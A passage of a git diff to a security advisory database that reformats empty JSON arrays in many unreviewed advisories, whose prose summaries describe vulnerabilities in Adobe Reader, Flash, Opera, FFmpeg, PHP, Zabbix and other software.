[], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-qqcg-7f79-v65c/GHSA-qqcg-7f79-v65c.json b/advisories/unreviewed/2022/01/GHSA-qqcg-7f79-v65c/GHSA-qqcg-7f79-v65c.json index 9fb8ff0b2fe..f099c118f34 100644 --- a/advisories/unreviewed/2022/01/GHSA-qqcg-7f79-v65c/GHSA-qqcg-7f79-v65c.json +++ b/advisories/unreviewed/2022/01/GHSA-qqcg-7f79-v65c/GHSA-qqcg-7f79-v65c.json @@ -7,12 +7,8 @@ "CVE-2022-23132" ], "details": "During Zabbix installation from RPM, DAC_OVERRIDE SELinux capability is in use to access PID files in [/var/run/zabbix] folder. In this case, Zabbix Proxy or Server processes can bypass file read, write and execute permissions check on the file system level", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-qwrx-f59j-pwr8/GHSA-qwrx-f59j-pwr8.json b/advisories/unreviewed/2022/01/GHSA-qwrx-f59j-pwr8/GHSA-qwrx-f59j-pwr8.json index b8d5778ead1..40e9fa2da27 100644 --- a/advisories/unreviewed/2022/01/GHSA-qwrx-f59j-pwr8/GHSA-qwrx-f59j-pwr8.json +++ b/advisories/unreviewed/2022/01/GHSA-qwrx-f59j-pwr8/GHSA-qwrx-f59j-pwr8.json @@ -7,12 +7,8 @@ "CVE-2021-30285" ], "details": "Improper validation of memory region in Hypervisor can lead to incorrect region mapping in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-qx2f-c94g-wj6x/GHSA-qx2f-c94g-wj6x.json b/advisories/unreviewed/2022/01/GHSA-qx2f-c94g-wj6x/GHSA-qx2f-c94g-wj6x.json index 6b50091e178..e19861a94d6 100644 --- a/advisories/unreviewed/2022/01/GHSA-qx2f-c94g-wj6x/GHSA-qx2f-c94g-wj6x.json +++ b/advisories/unreviewed/2022/01/GHSA-qx2f-c94g-wj6x/GHSA-qx2f-c94g-wj6x.json @@ -7,12 +7,8 @@ "CVE-2021-45064" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-rjr7-pjq2-v9j9/GHSA-rjr7-pjq2-v9j9.json b/advisories/unreviewed/2022/01/GHSA-rjr7-pjq2-v9j9/GHSA-rjr7-pjq2-v9j9.json index f52b7dfa1fa..2943c29e787 100644 --- a/advisories/unreviewed/2022/01/GHSA-rjr7-pjq2-v9j9/GHSA-rjr7-pjq2-v9j9.json +++ b/advisories/unreviewed/2022/01/GHSA-rjr7-pjq2-v9j9/GHSA-rjr7-pjq2-v9j9.json @@ -7,12 +7,8 @@ "CVE-2022-22113" ], "details": "In DayByDay CRM, versions 2.2.0 through 2.2.1 (latest) are vulnerable to Insufficient Session Expiration. When a password has been changed by the user or by an administrator, a user that was already logged in, will still have access to the application even after the password was changed.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-v5pj-64cf-6wc9/GHSA-v5pj-64cf-6wc9.json b/advisories/unreviewed/2022/01/GHSA-v5pj-64cf-6wc9/GHSA-v5pj-64cf-6wc9.json index a000702d945..a9c3aea975e 100644 --- a/advisories/unreviewed/2022/01/GHSA-v5pj-64cf-6wc9/GHSA-v5pj-64cf-6wc9.json +++ b/advisories/unreviewed/2022/01/GHSA-v5pj-64cf-6wc9/GHSA-v5pj-64cf-6wc9.json @@ -7,12 +7,8 @@ "CVE-2021-46171" ], "details": "Modex v2.11 was discovered to contain a NULL pointer dereference in set_create_id() at xtract.c.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-vw76-jj3v-492m/GHSA-vw76-jj3v-492m.json b/advisories/unreviewed/2022/01/GHSA-vw76-jj3v-492m/GHSA-vw76-jj3v-492m.json index 2c4193fcabb..aa74264d133 100644 --- a/advisories/unreviewed/2022/01/GHSA-vw76-jj3v-492m/GHSA-vw76-jj3v-492m.json +++ b/advisories/unreviewed/2022/01/GHSA-vw76-jj3v-492m/GHSA-vw76-jj3v-492m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-w5fv-j786-whp9/GHSA-w5fv-j786-whp9.json b/advisories/unreviewed/2022/01/GHSA-w5fv-j786-whp9/GHSA-w5fv-j786-whp9.json index ad475d2a5ac..ac7a483582a 100644 --- a/advisories/unreviewed/2022/01/GHSA-w5fv-j786-whp9/GHSA-w5fv-j786-whp9.json +++ b/advisories/unreviewed/2022/01/GHSA-w5fv-j786-whp9/GHSA-w5fv-j786-whp9.json @@ -7,12 +7,8 @@ "CVE-2021-45051" ], "details": "Adobe Bridge version 11.1.2 (and earlier) and version 12.0 (and earlier) are affected by an use-after-free vulnerability in the processing of Format event actions that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-wf32-jq3g-rpp7/GHSA-wf32-jq3g-rpp7.json b/advisories/unreviewed/2022/01/GHSA-wf32-jq3g-rpp7/GHSA-wf32-jq3g-rpp7.json index 6ebfc4f9990..bebb0416807 100644 --- a/advisories/unreviewed/2022/01/GHSA-wf32-jq3g-rpp7/GHSA-wf32-jq3g-rpp7.json +++ b/advisories/unreviewed/2022/01/GHSA-wf32-jq3g-rpp7/GHSA-wf32-jq3g-rpp7.json @@ -7,12 +7,8 @@ "CVE-2021-44741" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-wmqh-98vp-whh4/GHSA-wmqh-98vp-whh4.json b/advisories/unreviewed/2022/01/GHSA-wmqh-98vp-whh4/GHSA-wmqh-98vp-whh4.json index f7e8d2ede1e..ac0d098ac9c 100644 --- a/advisories/unreviewed/2022/01/GHSA-wmqh-98vp-whh4/GHSA-wmqh-98vp-whh4.json +++ b/advisories/unreviewed/2022/01/GHSA-wmqh-98vp-whh4/GHSA-wmqh-98vp-whh4.json @@ -7,12 +7,8 @@ "CVE-2021-44740" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-wv3p-x8gm-ch5w/GHSA-wv3p-x8gm-ch5w.json b/advisories/unreviewed/2022/01/GHSA-wv3p-x8gm-ch5w/GHSA-wv3p-x8gm-ch5w.json index 371fc6722bc..37ca61756b6 100644 --- a/advisories/unreviewed/2022/01/GHSA-wv3p-x8gm-ch5w/GHSA-wv3p-x8gm-ch5w.json +++ b/advisories/unreviewed/2022/01/GHSA-wv3p-x8gm-ch5w/GHSA-wv3p-x8gm-ch5w.json @@ -7,12 +7,8 @@ "CVE-2021-44713" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in application denial of service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-xhxm-v6fm-53p3/GHSA-xhxm-v6fm-53p3.json b/advisories/unreviewed/2022/01/GHSA-xhxm-v6fm-53p3/GHSA-xhxm-v6fm-53p3.json index 0c13e507b82..8de75c74275 100644 --- a/advisories/unreviewed/2022/01/GHSA-xhxm-v6fm-53p3/GHSA-xhxm-v6fm-53p3.json +++ b/advisories/unreviewed/2022/01/GHSA-xhxm-v6fm-53p3/GHSA-xhxm-v6fm-53p3.json @@ -7,12 +7,8 @@ "CVE-2021-45406" ], "details": "In SalonERP 3.0.1, a SQL injection vulnerability allows an attacker to inject payload using 'sql' parameter in SQL query while generating a report. Upon successfully discovering the login admin password hash, it can be decrypted to obtain the plain-text password.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-xjcm-w8fw-q3jw/GHSA-xjcm-w8fw-q3jw.json b/advisories/unreviewed/2022/01/GHSA-xjcm-w8fw-q3jw/GHSA-xjcm-w8fw-q3jw.json index e83eb477c21..3e4599758ff 100644 --- a/advisories/unreviewed/2022/01/GHSA-xjcm-w8fw-q3jw/GHSA-xjcm-w8fw-q3jw.json +++ b/advisories/unreviewed/2022/01/GHSA-xjcm-w8fw-q3jw/GHSA-xjcm-w8fw-q3jw.json @@ -7,12 +7,8 @@ "CVE-2021-44701" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/01/GHSA-xv38-ph7h-p3qw/GHSA-xv38-ph7h-p3qw.json b/advisories/unreviewed/2022/01/GHSA-xv38-ph7h-p3qw/GHSA-xv38-ph7h-p3qw.json index 3ee9f60535b..4205659d200 100644 --- a/advisories/unreviewed/2022/01/GHSA-xv38-ph7h-p3qw/GHSA-xv38-ph7h-p3qw.json +++ b/advisories/unreviewed/2022/01/GHSA-xv38-ph7h-p3qw/GHSA-xv38-ph7h-p3qw.json @@ -7,12 +7,8 @@ "CVE-2021-44704" ], "details": "Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-22mj-96mj-m59p/GHSA-22mj-96mj-m59p.json b/advisories/unreviewed/2022/05/GHSA-22mj-96mj-m59p/GHSA-22mj-96mj-m59p.json index 53cee358369..ce3f0a31fb2 100644 --- a/advisories/unreviewed/2022/05/GHSA-22mj-96mj-m59p/GHSA-22mj-96mj-m59p.json +++ b/advisories/unreviewed/2022/05/GHSA-22mj-96mj-m59p/GHSA-22mj-96mj-m59p.json @@ -7,12 +7,8 @@ "CVE-2012-0755" ], "details": "Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to bypass intended access restrictions via unspecified vectors, a different vulnerability than CVE-2012-0756.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2368-j9pf-v6jc/GHSA-2368-j9pf-v6jc.json b/advisories/unreviewed/2022/05/GHSA-2368-j9pf-v6jc/GHSA-2368-j9pf-v6jc.json index ebcb9c69ece..fea8cb8f76c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2368-j9pf-v6jc/GHSA-2368-j9pf-v6jc.json +++ b/advisories/unreviewed/2022/05/GHSA-2368-j9pf-v6jc/GHSA-2368-j9pf-v6jc.json @@ -7,12 +7,8 @@ "CVE-2010-2421" ], "details": "Multiple unspecified vulnerabilities in Opera before 10.54 have unknown impact and attack vectors related to (1) \"extremely severe,\" (2) \"highly severe,\" (3) \"moderately severe,\" and (4) \"less severe\" issues.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-23m3-jp2w-3vpp/GHSA-23m3-jp2w-3vpp.json b/advisories/unreviewed/2022/05/GHSA-23m3-jp2w-3vpp/GHSA-23m3-jp2w-3vpp.json index 395874c8285..ee77a344cb3 100644 --- a/advisories/unreviewed/2022/05/GHSA-23m3-jp2w-3vpp/GHSA-23m3-jp2w-3vpp.json +++ b/advisories/unreviewed/2022/05/GHSA-23m3-jp2w-3vpp/GHSA-23m3-jp2w-3vpp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-23v8-p364-5gvm/GHSA-23v8-p364-5gvm.json b/advisories/unreviewed/2022/05/GHSA-23v8-p364-5gvm/GHSA-23v8-p364-5gvm.json index 886d3b0c5f9..7fe26c29a24 100644 --- a/advisories/unreviewed/2022/05/GHSA-23v8-p364-5gvm/GHSA-23v8-p364-5gvm.json +++ b/advisories/unreviewed/2022/05/GHSA-23v8-p364-5gvm/GHSA-23v8-p364-5gvm.json @@ -7,12 +7,8 @@ "CVE-2008-6474" ], "details": "The management interface in F5 BIG-IP 9.4.3 allows remote authenticated users with Resource Manager privileges to inject arbitrary Perl code via unspecified configuration settings related to Perl EP3 with templates, probably triggering static code injection.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-248p-gq7w-24rp/GHSA-248p-gq7w-24rp.json b/advisories/unreviewed/2022/05/GHSA-248p-gq7w-24rp/GHSA-248p-gq7w-24rp.json index 69afb50e51d..bd39258a040 100644 --- a/advisories/unreviewed/2022/05/GHSA-248p-gq7w-24rp/GHSA-248p-gq7w-24rp.json +++ b/advisories/unreviewed/2022/05/GHSA-248p-gq7w-24rp/GHSA-248p-gq7w-24rp.json @@ -7,12 +7,8 @@ "CVE-2010-2216" ], "details": "Adobe Flash Player before 9.0.280 and 10.x before 10.1.82.76, and Adobe AIR before 2.0.3, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-0209, CVE-2010-2213, and CVE-2010-2214.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-255m-v9ff-ggrc/GHSA-255m-v9ff-ggrc.json b/advisories/unreviewed/2022/05/GHSA-255m-v9ff-ggrc/GHSA-255m-v9ff-ggrc.json index f69c4764f96..81e627d1aff 100644 --- a/advisories/unreviewed/2022/05/GHSA-255m-v9ff-ggrc/GHSA-255m-v9ff-ggrc.json +++ b/advisories/unreviewed/2022/05/GHSA-255m-v9ff-ggrc/GHSA-255m-v9ff-ggrc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-269j-j2cg-h6qp/GHSA-269j-j2cg-h6qp.json b/advisories/unreviewed/2022/05/GHSA-269j-j2cg-h6qp/GHSA-269j-j2cg-h6qp.json index 1fe3f369509..5f0a50e242c 100644 --- a/advisories/unreviewed/2022/05/GHSA-269j-j2cg-h6qp/GHSA-269j-j2cg-h6qp.json +++ b/advisories/unreviewed/2022/05/GHSA-269j-j2cg-h6qp/GHSA-269j-j2cg-h6qp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-28g7-p757-pxq8/GHSA-28g7-p757-pxq8.json b/advisories/unreviewed/2022/05/GHSA-28g7-p757-pxq8/GHSA-28g7-p757-pxq8.json index ff45b008bdc..28341bb9112 100644 --- a/advisories/unreviewed/2022/05/GHSA-28g7-p757-pxq8/GHSA-28g7-p757-pxq8.json +++ b/advisories/unreviewed/2022/05/GHSA-28g7-p757-pxq8/GHSA-28g7-p757-pxq8.json @@ -7,12 +7,8 @@ "CVE-2012-2779" ], "details": "Unspecified vulnerability in the decode_frame function in libavcodec/indeo5.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to an invalid \"gop header\" and decoding in a \"half initialized context.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-28mr-3phc-39gr/GHSA-28mr-3phc-39gr.json b/advisories/unreviewed/2022/05/GHSA-28mr-3phc-39gr/GHSA-28mr-3phc-39gr.json index f244f54a820..e019db52424 100644 --- a/advisories/unreviewed/2022/05/GHSA-28mr-3phc-39gr/GHSA-28mr-3phc-39gr.json +++ b/advisories/unreviewed/2022/05/GHSA-28mr-3phc-39gr/GHSA-28mr-3phc-39gr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-28qm-wmpf-4vwh/GHSA-28qm-wmpf-4vwh.json b/advisories/unreviewed/2022/05/GHSA-28qm-wmpf-4vwh/GHSA-28qm-wmpf-4vwh.json index 664d828f16e..1f30aa0e3d2 100644 --- a/advisories/unreviewed/2022/05/GHSA-28qm-wmpf-4vwh/GHSA-28qm-wmpf-4vwh.json +++ b/advisories/unreviewed/2022/05/GHSA-28qm-wmpf-4vwh/GHSA-28qm-wmpf-4vwh.json @@ -7,12 +7,8 @@ "CVE-2011-0752" ], "details": "The extract function in PHP before 5.2.15 does not prevent use of the EXTR_OVERWRITE parameter to overwrite (1) the GLOBALS superglobal array and (2) the this variable, which allows context-dependent attackers to bypass intended access restrictions by modifying data structures that were not intended to depend on external input, a related issue to CVE-2005-2691 and CVE-2006-3758.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-29c8-3p4j-qm8x/GHSA-29c8-3p4j-qm8x.json b/advisories/unreviewed/2022/05/GHSA-29c8-3p4j-qm8x/GHSA-29c8-3p4j-qm8x.json index 57a89a24b27..05f390e476f 100644 --- a/advisories/unreviewed/2022/05/GHSA-29c8-3p4j-qm8x/GHSA-29c8-3p4j-qm8x.json +++ b/advisories/unreviewed/2022/05/GHSA-29c8-3p4j-qm8x/GHSA-29c8-3p4j-qm8x.json @@ -7,12 +7,8 @@ "CVE-2011-0586" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-29w7-7v82-g4cw/GHSA-29w7-7v82-g4cw.json b/advisories/unreviewed/2022/05/GHSA-29w7-7v82-g4cw/GHSA-29w7-7v82-g4cw.json index 0576a852d71..fe9276e00d7 100644 --- a/advisories/unreviewed/2022/05/GHSA-29w7-7v82-g4cw/GHSA-29w7-7v82-g4cw.json +++ b/advisories/unreviewed/2022/05/GHSA-29w7-7v82-g4cw/GHSA-29w7-7v82-g4cw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2c7h-c396-x7rf/GHSA-2c7h-c396-x7rf.json b/advisories/unreviewed/2022/05/GHSA-2c7h-c396-x7rf/GHSA-2c7h-c396-x7rf.json index 1cc402c968b..f8b61bf3fe8 100644 --- a/advisories/unreviewed/2022/05/GHSA-2c7h-c396-x7rf/GHSA-2c7h-c396-x7rf.json +++ b/advisories/unreviewed/2022/05/GHSA-2c7h-c396-x7rf/GHSA-2c7h-c396-x7rf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2f8f-mr6r-cvh9/GHSA-2f8f-mr6r-cvh9.json b/advisories/unreviewed/2022/05/GHSA-2f8f-mr6r-cvh9/GHSA-2f8f-mr6r-cvh9.json index e3d25ee69ad..0574d7a3e0c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2f8f-mr6r-cvh9/GHSA-2f8f-mr6r-cvh9.json +++ b/advisories/unreviewed/2022/05/GHSA-2f8f-mr6r-cvh9/GHSA-2f8f-mr6r-cvh9.json @@ -7,12 +7,8 @@ "CVE-2010-2208" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, dereference a heap object after this object's deletion, which allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2gfx-wjv6-pqp4/GHSA-2gfx-wjv6-pqp4.json b/advisories/unreviewed/2022/05/GHSA-2gfx-wjv6-pqp4/GHSA-2gfx-wjv6-pqp4.json index 362068be8ff..75d8820d6ce 100644 --- a/advisories/unreviewed/2022/05/GHSA-2gfx-wjv6-pqp4/GHSA-2gfx-wjv6-pqp4.json +++ b/advisories/unreviewed/2022/05/GHSA-2gfx-wjv6-pqp4/GHSA-2gfx-wjv6-pqp4.json @@ -7,12 +7,8 @@ "CVE-2010-2202" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2ggm-7p9c-qvxr/GHSA-2ggm-7p9c-qvxr.json b/advisories/unreviewed/2022/05/GHSA-2ggm-7p9c-qvxr/GHSA-2ggm-7p9c-qvxr.json index e3418a1efba..ea7c81cedde 100644 --- a/advisories/unreviewed/2022/05/GHSA-2ggm-7p9c-qvxr/GHSA-2ggm-7p9c-qvxr.json +++ b/advisories/unreviewed/2022/05/GHSA-2ggm-7p9c-qvxr/GHSA-2ggm-7p9c-qvxr.json @@ -7,12 +7,8 @@ "CVE-2010-2662" ], "details": "Opera before 10.60 allows remote attackers to bypass the popup blocker via a javascript: URL and a \"fake click.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2gx9-pfxr-fgh5/GHSA-2gx9-pfxr-fgh5.json b/advisories/unreviewed/2022/05/GHSA-2gx9-pfxr-fgh5/GHSA-2gx9-pfxr-fgh5.json index e8a36c47b62..2f3531da1cd 100644 --- a/advisories/unreviewed/2022/05/GHSA-2gx9-pfxr-fgh5/GHSA-2gx9-pfxr-fgh5.json +++ b/advisories/unreviewed/2022/05/GHSA-2gx9-pfxr-fgh5/GHSA-2gx9-pfxr-fgh5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2h37-p8hq-v395/GHSA-2h37-p8hq-v395.json b/advisories/unreviewed/2022/05/GHSA-2h37-p8hq-v395/GHSA-2h37-p8hq-v395.json index 7b0262d1e0e..efa5d098ee4 100644 --- a/advisories/unreviewed/2022/05/GHSA-2h37-p8hq-v395/GHSA-2h37-p8hq-v395.json +++ b/advisories/unreviewed/2022/05/GHSA-2h37-p8hq-v395/GHSA-2h37-p8hq-v395.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2jx9-xx2g-v74j/GHSA-2jx9-xx2g-v74j.json b/advisories/unreviewed/2022/05/GHSA-2jx9-xx2g-v74j/GHSA-2jx9-xx2g-v74j.json index ad6927a6e08..02e155f3731 100644 --- a/advisories/unreviewed/2022/05/GHSA-2jx9-xx2g-v74j/GHSA-2jx9-xx2g-v74j.json +++ b/advisories/unreviewed/2022/05/GHSA-2jx9-xx2g-v74j/GHSA-2jx9-xx2g-v74j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2p48-mg67-hr6x/GHSA-2p48-mg67-hr6x.json b/advisories/unreviewed/2022/05/GHSA-2p48-mg67-hr6x/GHSA-2p48-mg67-hr6x.json index 9ce72d72ab8..5f0f0745118 100644 --- a/advisories/unreviewed/2022/05/GHSA-2p48-mg67-hr6x/GHSA-2p48-mg67-hr6x.json +++ b/advisories/unreviewed/2022/05/GHSA-2p48-mg67-hr6x/GHSA-2p48-mg67-hr6x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2qrp-v3mf-g36h/GHSA-2qrp-v3mf-g36h.json b/advisories/unreviewed/2022/05/GHSA-2qrp-v3mf-g36h/GHSA-2qrp-v3mf-g36h.json index 280de7de4c0..c22f05e7529 100644 --- a/advisories/unreviewed/2022/05/GHSA-2qrp-v3mf-g36h/GHSA-2qrp-v3mf-g36h.json +++ b/advisories/unreviewed/2022/05/GHSA-2qrp-v3mf-g36h/GHSA-2qrp-v3mf-g36h.json @@ -7,12 +7,8 @@ "CVE-2010-2168" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content, involving the newfunction (0x44) operator and an \"invalid pointer vulnerability\" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2201.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2qwg-3h4c-44rq/GHSA-2qwg-3h4c-44rq.json b/advisories/unreviewed/2022/05/GHSA-2qwg-3h4c-44rq/GHSA-2qwg-3h4c-44rq.json index baf64e343d8..f04598d96f6 100644 --- a/advisories/unreviewed/2022/05/GHSA-2qwg-3h4c-44rq/GHSA-2qwg-3h4c-44rq.json +++ b/advisories/unreviewed/2022/05/GHSA-2qwg-3h4c-44rq/GHSA-2qwg-3h4c-44rq.json @@ -13,9 +13,7 @@ "score": 